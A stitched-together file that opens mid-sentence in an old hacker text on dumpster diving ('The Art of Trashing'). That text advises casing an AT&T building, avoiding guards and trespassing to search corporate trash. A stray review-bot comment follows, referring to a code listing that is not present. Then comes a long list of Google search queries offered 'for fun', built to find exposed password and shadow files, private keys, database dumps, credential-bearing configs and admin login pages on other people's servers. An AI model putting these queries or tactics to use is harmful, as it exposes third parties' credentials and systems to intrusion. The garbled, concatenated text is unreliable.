ENOUGH FOR THE POLICE TO DO, ACCORDING TO THE U.S. SUPREME COURT, THEN IT
MUST BE GOOD ENOUGH FOR THE PEOPLE TO DO)
THE ART OF TRASHING
-------------------
Before attempting to trash a certain place (for example, I will use a
local AT&T building), you might find it useful to follow the "rules" of the
trasher.
Before you begin to dive into the nearest dumpster, first find out about the
security (if any) by watching the building for a few days and take notes on
what goes on, in, and around the building. Next, find out the garbage
truck(s) route and schedule so you can trash at the most beneficial times.
To truly trash, you must be willing to climb into the trash dumpster(s) and
be prepared to dig for the "gold." You must climb all the way in and dig
around because most of the important trash is usually at the bottom (huge
print-outs, heavy memo books, etc). You cannot just run over and reach for
the nearest bag, you might find something useful but most probably you will
find someones used coffee cup.
After removing the trash you think you might find interesting, do not rummage
thru the selected garbage there, wait till you are in a secluded spot, a
forest or your home (only if you live nearby because the trash can be very
heavy if you don't have a car) for example.
GETTING CAUGHT
--------------
The probability of getting caught is very slim (except for AT&T offices
and things of that sort). Here is a true life example:
It was a cold and dark night and a few friends and I were only on our seventh
time of trashing. All was cool until, from a distant side door a guard came
running out to see what we were doing. Having been surprised and having no
way of escaping (I was buried deep in the garbage and certainly had no chance
to escape), we waited for the guard to arrive. the guard rushed over and
said, "What are you doing here? This is private property!"
After looking at me and doing a double take he then added, "What the hell are
you doing in there???" We were quite nervous and after about a minute or so
one of my friends said, "Oh, we were just walking thru the forest and we
took a short cut thru here." I thought that that was a stupid thing to say
becuase why would we take a short cut thru a trash dumpster?!! To my
surprise, however, the guard said, "Well, OK, but don't come around here
again or you will be arrested!" We left and returned the next day for a
successful night.
WHAT THEY CAN DO
----------------
If you ever get caught, they (the company - usually security) will most
probably let you go and not do anything about it because it sounds pretty
funny saying, "I want him (them) prosecuted for taking out the garbage!" The
only thing they can really do is to get you for trespassing which they don't
usually do to nice kids anyway, although AT&T has been known to prosecute
anyone caught in their garbage.
COMMENTS
--------
Most of the time, you don't have to worry about food and other
interesting trash (except if you like to recycle used food and in that case
you are probably too fat to fit in a trash dumpster) because big companies
usually have separate dumpsters for cafeteria food.
I recommend that you trash with as many people as you can because it will be
much quicker and safer because some people can be "look outs" (do not trash
with over seven people though, because it begins to get noisy). Don't feel
threatened by bright security lights or guards, they are usually easy to
avoid and since there are not usually bright lights near or on the trash
dumpsters, you will be home free.
Of course, all of the above does not count for AT&T. AT&T has since become
aware of the trasher and has one or even all of the following securities:
(1) A lock on the trash dumpster.
(2) Dumpsters flooded by bright security lights.
(3) Guards located near or sometimes at the dumpsters.
(4) Fence and barbed wire enclosing dumpsters.
(5) Shredded garbage (the trasher's worst nightmare)
There are more, but these are the most popular.
Trashing is an art, so if at first you don't succeed, trash, trash again.
rash again
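Review bot: The file ends on an orphaned fragment, "rash again", which only repeats the tail of the preceding line ("...trash, trash again.") and should be dropped. Higher up in the same hunk, the horse.c listing is transcription-damaged rather than valid C: "main() [" and "stop() [" carry square brackets where braces belong, the scanf line has no terminating semicolon, and the fprintf/fclose lines are prefixed with "#". If this file is meant as a verbatim archive of a historical text, leave the listing uncorrected and say so in a short header giving the source and date. The "D/L5" and "D/L6" separators show that several documents were concatenated here with no provenance, and the file name and commit message ("Initial push...") give a reader no indication of what is being added or why.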

View File

@@ -0,0 +1,777 @@
Each of these things can be copied and pasted into Google search for some good old fashioned fun! Enjoy!
admin account info” filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
“# -FrontPage-” ext:pwd inurl:(service | authors | administrators | users) “# -FrontPage-” inurl:service.pwd
“AutoCreate=TRUE password=*”
“http://*:*@www” domainname
“index of/” “ws_ftp.ini” “parent directory”
“liveice configuration file” ext:cfg -site:sourceforge.net
“parent directory” +proftpdpasswd
Duclassified” -site:duware.com “DUware All Rights reserved”
duclassmate” -site:duware.com
Dudirectory” -site:duware.com
dudownload” -site:duware.com
Elite Forum Version *.*”
Link Department”
“sets mode: +k”
“your password is” filetype:log
DUpaypal” -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret “current configuration” -intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -”uid..pwd” database | server | dsn
ext:inc “pwd=” “UID=”
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:”htaccess|passwd|shadow|htusers”
filetype:cfg mrtg “target
filetype:cfm “cfapplication name” password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings “User ID”
filetype:dat “password.dat”
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:”serv-u.ini”
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log “See `ipsec copyright”
filetype:log inurl:”password.log”
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword”
filetype:reg reg +intext:â? WINVNC3â?
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql “insert into” (pass|passwd|password)
filetype:sql (“values * MD5″ | “values * password” | “values * encrypt”)
filetype:sql +”IDENTIFIED BY” -cvs
filetype:sql password
filetype:url +inurl:”ftp://” +inurl:”;@”
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:”enable password 7″
intext:”enable secret 5 $”
intext:”EZGuestbook”
intext:”Web Wiz Journal”
intitle:”index of” intext:connect.inc
intitle:”index of” intext:globals.inc
intitle:”Index of” passwords modified
intitle:”Index of” sc_serv.conf sc_serv content
intitle:”phpinfo()” +”mysql.default_password” +”Zend s?ri?ting Language Engine”
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:”secring.skr”|”secring.pgp”|”secring.bak”
intitle:rapidshare intext:login
inurl:”calendars?ri?t/users.txt”
inurl:”editor/list.asp” | inurl:”database_editor.asp” | inurl:”login.asa” “are set”
inurl:”GRC.DAT” intext:”password”
inurl:”Sites.dat”+”PASS=”
inurl:”slapd.conf” intext:”credentials” -manpage -”Manual Page” -man: -sample
inurl:”slapd.conf” intext:”rootpw” -manpage -”Manual Page” -man: -sample
inurl:”wvdial.conf” intext:”password”
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:”index.of./” sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs “intitle:index of”
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:”remote assessment” OpenAanval Console
intitle:opengroupware.org “resistance is obsolete” “Report Bugs” “Username” “password”
“bp blog admin” intitle:login | intitle:admin -site:johnny.ihackstuff.com
“Emergisoft web applications are a part of our”
“Establishing a secure Integrated Lights Out session with” OR intitle:”Data Frame Browser not HTTP 1.1 compatible” OR intitle:”HP Integrated Lights-
“HostingAccelerator” intitle:”login” +”Username” -”news” -demo
“iCONECT 4.1 :: Login”
“IMail Server Web Messaging” intitle:login
“inspanel” intitle:”login” -”cannot” “Login ID” -site:inspediumsoft.com
“intitle:3300 Integrated Communications Platform” inurl:main.htm
“Login Sun Cobalt RaQ”
“login prompt” inurl:GM.cgi
“Login to Usermin” inurl:20000
“Microsoft CRM : Unsupported Browser Version”
“OPENSRS Domain Management” inurl:manage.cgi
“pcANYWHERE EXPRESS Java Client”
“Please authenticate yourself to get access to the management interface”
“please log in”
“Please login with admin pass” -”leak” -sourceforge
CuteNews” “2003..2005 CutePHP”
DWMail” password intitle:dwmail
Merak Mail Server Software” -.gov -.mil -.edu -site:merakmailserver.com
Midmart Messageboard” “Administrator Login”
Monster Top List” MTL numrange:200-
UebiMiau” -site:sourceforge.net
“site info for” “Enter Admin Password”
“SquirrelMail version” “By the SquirrelMail development Team”
“SysCP login”
“This is a restricted Access Server” “Javas?ri?t Not Enabled!”|”Messenger Express” -edu -ac
“This section is for Administrators only. If you are an administrator then please”
“ttawlogin.cgi/?action=”
“VHCS Pro ver” -demo
“VNC Desktop” inurl:5800
“Web-Based Management” “Please input password to login” -inurl:johnny.ihackstuff.com
“WebExplorer Server Login” “Welcome to WebExplorer Server”
“WebSTAR Mail Please Log In”
“You have requested access to a restricted area of our website. Please authenticate yourself to continue.”
“You have requested to access the management functions” -.edu
(intitle:”Please login Forums
UBB.threads”)|(inurl:login.php “ubb”)
(intitle:”Please login Forums
WWWThreads”)|(inurl:”wwwthreads/login.php”)|(inurl:”wwwthreads/login.pl?Cat=”)
(intitle:”rymo Login”)|(intext:”Welcome to rymo”) -family
(intitle:”WmSC e-Cart Administration”)|(intitle:”WebMyStyle e-Cart Administration”)
(inurl:”ars/cgi-bin/arweb?O=0″ | inurl:arweb.jsp) -site:remedy.com -site:mil
4images Administration Control Panel
allintitle:”Welcome to the Cyclades”
allinurl:”exchange/logon.asp”
allinurl:wps/portal/ login
ASP.login_aspx “ASP.NET_SessionId”
CGI:IRC Login
ext:cgi intitle:”control panel” “enter your owner password to continue!”
ez Publish administration
filetype:php inurl:”webeditor.php”
filetype:pl “Download: SuSE Linux Openexchange Server CA”
filetype:r2w r2w
intext:”"BiTBOARD v2.0″ BiTSHiFTERS Bulletin Board”
intext:”Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.” -edu
intext:”Mail admins login here to administrate your domain.”
intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin
intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin
intext:”Storage Management Server for” intitle:”Server Administration”
intext:”Welcome to” inurl:”cp” intitle:”H-SPHERE” inurl:”begin.html” -Fee
intext:”vbulletin” inurl:admincp
intitle:”*- HP WBEM Login” | “You are being prompted to provide login account information for *” | “Please provide the information requested and press
intitle:”Admin Login” “admin login” “blogware”
intitle:”Admin login” “Web Site Administration” “Copyright”
intitle:”AlternC Desktop”
intitle:”Athens Authentication Point”
intitle:”b2evo > Login form” “Login form. You must log in! You will have to accept cookies in order to log in” -demo -site:b2evolution.net
intitle:”Cisco CallManager User Options Log On” “Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:”ColdFusion Administrator Login”
intitle:”communigate pro * *” intitle:”entrance”
intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo
intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo
intitle:”Dell Remote Access Controller”
intitle:”Docutek ERes Admin Login” -edu
intitle:”Employee Intranet Login”
intitle:”eMule *” intitle:”- Web Control Panel” intext:”Web Control Panel” “Enter your password here.”
intitle:”ePowerSwitch Login”
intitle:”eXist Database Administration” -demo
intitle:”EXTRANET * Identification”
intitle:”EXTRANET login” -.edu -.mil -.gov
intitle:”EZPartner” -netpond
intitle:”Flash Operator Panel” -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:”i-secure v1.1″ -edu
intitle:”Icecast Administration Admin Page”
intitle:”iDevAffiliate admin” -demo
intitle:”ISPMan : Unauthorized Access prohibited”
intitle:”ITS System Information” “Please log on to the SAP System”
intitle:”Kurant Corporation StoreSense” filetype:bok
intitle:”ListMail Login” admin -demo
intitle:”Login -
Easy File Sharing Web Server”
intitle:”Login Forum
AnyBoard” intitle:”If you are a new user:” intext:”Forum
AnyBoard” inurl:gochat -edu
intitle:”Login to @Mail” (ext:pl | inurl:”index”) -dwaffleman
intitle:”Login to Cacti”
intitle:”Login to the forums @www.aimoo.com” inurl:login.cfm?id=
intitle:”MailMan Login”
intitle:”Member Login” “NOTE: Your browser must have cookies enabled in order to log into the site.” ext:php OR ext:cgi
intitle:”Merak Mail Server Web Administration” -ihackstuff.com
intitle:”microsoft certificate services” inurl:certsrv
intitle:”MikroTik RouterOS Managing Webpage”
intitle:”MX Control Console” “If you cant remember”
intitle:”Novell Web Services” “GroupWise” -inurl:”doc/11924″ -.mil -.edu -.gov -filetype:pdf
intitle:”Novell Web Services” intext:”Select a service and a language.”
intitle:”oMail-admin Administration Login” -inurl:omnis.ch
intitle:”OnLine Recruitment Program Login”
intitle:”Philex 0.2*” -s?ri?t -site:freelists.org
intitle:”PHP Advanced Transfer” inurl:”login.php”
intitle:”php icalendar administration” -site:sourceforge.net
intitle:”php icalendar administration” -site:sourceforge.net
intitle:”phpPgAdmin Login” Language
intitle:”PHProjekt login” login password
intitle:”please login” “your password is *”
intitle:”Remote Desktop Web Connection” inurl:tsweb
intitle:”SFXAdmin sfx_global” | intitle:”SFXAdmin sfx_local” | intitle:”SFXAdmin sfx_test”
intitle:”SHOUTcast Administrator” inurl:admin.cgi
intitle:”site administration: please log in” “site designed by emarketsouth”
intitle:”Supero Doctor III” -inurl:supermicro
intitle:”SuSE Linux Openexchange Server” “Please activate Javas?ri?t!”
intitle:”teamspeak server-administration
intitle:”Tomcat Server Administration”
intitle:”TOPdesk ApplicationServer”
intitle:”TUTOS Login”
intitle:”TWIG Login”
intitle:”vhost” intext:”vHost . 2000-2004″
intitle:”Virtual Server Administration System”
intitle:”VisNetic WebMail” inurl:”/mail/”
intitle:”VitalQIP IP Management System”
intitle:”VMware Management Interface:” inurl:”vmware/en/”
intitle:”VNC viewer for Java”
intitle:”web-cyradm”|”by Luc de Louw” “This is only for authorized users” -tar.gz -site:web-cyradm.org
intitle:”WebLogic Server” intitle:”Console Login” inurl:console
intitle:”Welcome Site/User Administrator” “Please select the language” -demos
intitle:”Welcome to Mailtraq WebMail”
intitle:”welcome to netware *” -site:novell.com
intitle:”WorldClient” intext:”? (2003|2004) Alt-N Technologies.”
intitle:”xams 0.0.0..15 Login”
intitle:”XcAuctionLite” | “DRIVEN BY XCENT” Lite inurl:admin
intitle:”XMail Web Administration Interface” intext:Login intext:password
intitle:”Zope Help System” inurl:HelpSys
intitle:”ZyXEL Prestige Router” “Enter password”
intitle:”inc. vpn 3000 concentrator”
intitle:(“TrackerCam Live Video”)|(“TrackerCam Application Login”)|(“Trackercam Remote”) -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office “Enter your username and password to login”
intitle:ilohamail ”
IlohaMail”
intitle:ilohamail intext:”Version 0.8.10″ ”
IlohaMail”
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:”RT is ? Copyright”
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess “Copyright *-* Novell, Inc”
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:”/admin/configuration. php?” Mystore
inurl:”/slxweb.dll/external?name=(custportal|webticketcust)”
inurl:”1220/parse_xml.cgi?”
inurl:”631/admin” (inurl:”op=*”) | (intitle:CUPS)
inurl:”:10000″ intext:webmin
inurl:”Activex/default.htm” “Demo”
inurl:”calendar.asp?action=login”
inurl:”default/login.php” intitle:”kerio”
inurl:”gs/adminlogin.aspx”
inurl:”php121login.php”
inurl:”suse/login.pl”
inurl:”typo3/index.php?u=” -demo
inurl:”usysinfo?login=true”
inurl:”utilities/TreeView.asp”
inurl:”vsadmin/login” | inurl:”vsadmin/admin” inurl:.php|.asp
Code:
nurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:”Miva Merchant Administration Login” -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:”Microsoft Software upd?t? Services”
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 “Oracle Enterprise Manager”
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator “welcome to mambo”
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:”WebCommander”
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php “SquirrelMail version”
inurl:metaframexp/default/login.asp | intitle:”Metaframe XP Login”
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:”postfix admin” ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl “Interface”
inurl:webvpn.html “login” “Please enter your”
Login (”
Jetbox One CMS â?¢” | ”
Jetstream ? *”)
Novell NetWare intext:”netware management portal version”
Outlook Web Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpWebMail
Please enter a valid password! inurl:polladmin
INDEXU
Ultima Online loginservers
W-Nailer Upload Area
intitle:”DocuShare” inurl:”docushare/dsweb/” -faq -gov -edu
“#mysql dump” filetype:sql
“#mysql dump” filetype:sql 21232f297a57a5a743894a0e4a801fc3
“allow_call_time_pass_reference” “PATH_INFO”
“Certificate Practice Statement” inurl:(PDF | DOC)
“Generated by phpSystem”
“generated by wwwstat”
“Host Vulnerability Summary Report”
“HTTP_FROM=googlebot” googlebot.com “Server_Software=”
“Index of” / “chat/logs”
“Installed Objects Scanner” inurl:default.asp
“MacHTTP” filetype:log inurl:machttp.log
“Mecury Version” “Infastructure Group”
“Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)” ext:log
“Most Submitted Forms and s?ri?ts” “this section”
“Network Vulnerability Assessment Report”
“not for distribution” confidential
“not for public release” -.edu -.gov -.mil
“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
“phpMyAdmin” “running on” inurl:”main.php”
“produced by getstats”
“Request Details” “Control Tree” “Server Variables”
“robots.txt” “Disallow:” filetype:txt
“Running in Child mode”
“sets mode: +p”
“sets mode: +s”
“Thank you for your order” +receipt
“This is a Shareaza Node”
“This report was generated by WebLog”
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
(intitle:”PRTG Traffic Grapher” inurl:”allsensors”)|(intitle:”PRTG Traffic Grapher Monitoring Results”)
(intitle:WebStatistica inurl:main.php) | (intitle:”WebSTATISTICA server”) -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
(inurl:”robot.txt” | inurl:”robots.txt” ) intext:disallow filetype:txt
+”:8080″ +”:3128″ +”:80″ filetype:txt
+”HSTSNR” -”netop.com”
-site:php.net -”The PHP Group” inurl:source inurl:url ext:pHp
94FBR “ADOBE PHOTOSHOP”
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:cdkey.txt
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
contacts ext:wml
data filetype:mdb -site:gov -site:mil
exported email addresses
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:”budget approved”) inurl:confidential
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:CDX CDX
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ics ics
ext:ini intext:env.ini
ext:jbf jbf
ext:ldif ldif
ext:log “Software: Microsoft Internet Information Services *.*”
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:reg “username=*” putty
ext:txt “Final encryption key”
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=” * Server.MapPath(“*.mdb”)
filetype:bkf bkf
filetype:blt “buddylist”
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:”Subject” +intext:”From” +intext:”To”
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -”cvs log”
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:pot inurl:john.pot
filetype:PS ps
filetype:pst inurl:”outlook.pst”
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg “Terminal Server Client”
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:”email.xls”
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please…
intext:”Session Start * * * *:*:* *” filetype:log
intext:”Tobias Oetiker” “traffic analysis”
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:”admin panel” +”
RedKernel”
intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:”AppServ Open Project” -site:www.appservnetwork.com
intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”
intitle:”Big Sister” +”OK Attention Trouble”
intitle:”curriculum vitae” filetype:doc
intitle:”edna:streaming mp3 server” -forums
intitle:”FTP root at”
intitle:”index of” +myd size
intitle:”Index Of” -inurl:maillog maillog size
intitle:”Index Of” cookies.txt size
intitle:”index of” mysql.conf OR mysql_config
intitle:”Index of” upload size parent directory
intitle:”index.of *” admin news.asp configview.asp
intitle:”index.of” .diz .nfo last modified
intitle:”Joomla Web Installer”
intitle:”LOGREP Log file reporting system” -site:itefix.no
intitle:”Multimon UPS status page”
intitle:”PHP Advanced Transfer” (inurl:index.php | inurl:showrecent.php )
intitle:”PhpMyExplorer” inurl:”index.php” -cvs
intitle:”statistics of” “advanced web statistics”
intitle:”System Statistics” +”System and Network Information Center”
intitle:”urchin (5|3|admin)” ext:cgi
intitle:”Usage Statistics for” “Generated by Webalizer”
intitle:”wbem” compaq login “Compaq Information Technologies Group”
intitle:”Web Server Statistics for ****”
intitle:”web server status” SSH Telnet
intitle:”Welcome to F-Secure Policy Manager Server Welcome Page”
intitle:”welcome.to.squeezebox”
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html “Bookmarks
intitle:index.of “Apache” “server at”
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:”phone”
inurl:”/axs/ax-admin.pl” -s?ri?t
inurl:”/cricket/grapher.cgi”
inurl:”bookmark.htm”
inurl:”cacti” +inurl:”graph_view.php” +”Settings Tree View” -cvs -RPM
inurl:”newsletter/admin/”
inurl:”newsletter/admin/” intitle:”newsletter admin”
inurl:”putty.reg”
inurl:”smb.conf” intext:”workgroup” filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe “Please distribute TestCGI”
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini “[emule]”
inurl:profiles filetype:mdb
inurl:report “EVEREST Home Edition ”
inurl:server-info “Apache Server Information”
inurl:server-status “apache”
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php “page generated”
inurl:wp-mail.php + “There doesnt seem to be any new mail.”
inurl:XcCDONTS.asp
ipsec.conf
ipsec.secrets
ipsec.secrets
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook “This is the addressbook for *” -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
rdbqds -site:.edu -site:.mil -site:.gov
robots.txt
site:edu admin grades
site:www.mailinator.com inurl:ShowMail.do
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!
Fichier contenant des informations sur le r?seau :
filetype:log intext:”ConnectionManager2″
“apricot admin” 00h
“by Reimar Hoven. All Rights Reserved. Disclaimer” | inurl:”log/logdb.dta”
“Network Host Assessment Report” “Internet Scanner”
“Output produced by SysWatch *”
“Phorum Admin” “Database Connection” inurl:forum inurl:admin
phpOpenTracker” Statistics
“powered | performed by Beyond Securitys Automated Scanning” -kazaa -example
“Shadow Security Scanner performed a vulnerability assessment”
“SnortSnarf alert page”
“The following report contains confidential information” vulnerability -search
“The statistics were last upd?t?d” “Daily”-microsoft.com
“this proxy is working fine!” “enter *” “URL***” * visit
“This report lists” “identified by Internet Scanner”
“Traffic Analysis for” “RMON Port * on unit *”
“Version Info” “Boot Version” “Internet Settings”
((inurl:ifgraph “Page generated at”) OR (“This page was built using ifgraph”))
Analysis Console for Incident Databases
ext:cfg radius.cfg
ext:cgi intext:”nrg-” ” This web page was created on ”
filetype:pdf “Assessment Report” nessus
filetype:php inurl:ipinfo.php “Distributed Intrusion Detection System”
filetype:php inurl:nqt intext:”Network Query Tool”
filetype:vsd vsd network -samples -examples
intext:”Welcome to the Web V.Networks” intitle:”V.Networks [Top]” -filetype:htm
intitle:”ADSL Configuration page”
intitle:”Azureus : Java BitTorrent Client Tracker”
intitle:”Belarc Advisor Current Profile” intext:”Click here for Belarcs PC Management products, for large and small companies.”
intitle:”BNBT Tracker Info”
intitle:”Microsoft Site Server Analysis”
intitle:”Nessus Scan Report” “This file was generated by Nessus”
intitle:”PHPBTTracker Statistics” | intitle:”PHPBT Tracker Statistics”
intitle:”Retina Report” “CONFIDENTIAL INFORMATION”
intitle:”start.managing.the.device” remote pbx acc
intitle:”sysinfo * ” intext:”Generated by Sysinfo * written by The Gamblers.”
intitle:”twiki” inurl:”TWikiUsers”
inurl:”/catalog.nsf” intitle:catalog
inurl:”install/install.php”
inurl:”map.asp?” intitle:”WhatsUp Gold”
inurl:”NmConsole/Login.asp” | intitle:”Login Ipswitch WhatsUp Professional 2005″ | intext:”Ipswitch WhatsUp Professional 2005 (SP1)” “Ipswitch, Inc”
inurl:”sitescope.html” intitle:”sitescope” intext:”refresh” -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? “In real life”
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:/counter/index.php intitle:”+PHPCounter 7.*”
inurl:CrazyWWWBoard.cgi intext:”detailed debugging information”
inurl:login.jsp.bak
inurl:ovcgi/jovw
inurl:phpSysInfo/ “created by phpsysinfo”
inurl:portscan.php “from Port”|”Port Range”
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
inurl:statrep.nsf -gov
inurl:status.cgi?host=all
inurl:testcgi xitami
inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
inurl:webutil.pl
Looking Glass
site:netcraft.com intitle:That.Site.Running Apache
“A syntax error has occurred” filetype:ihtml
“access denied for user” “using password”
“An illegal character has been found in the statement” -”previous message”
“ASP.NET_SessionId” “data source=”
“Cant connect to local” intitle:warning
“Chatologica MetaSearch” “stack tracking”
“detected an internal error [IBM][CLI Driver][DB2/6000]”
“error found handling the request” cocoon filetype:xml
“Fatal error: Call to undefined function” -reply -the -next
“Incorrect syntax near”
“Incorrect syntax near”
“Internal Server Error” “server at”
“Invision Power Board Database Error”
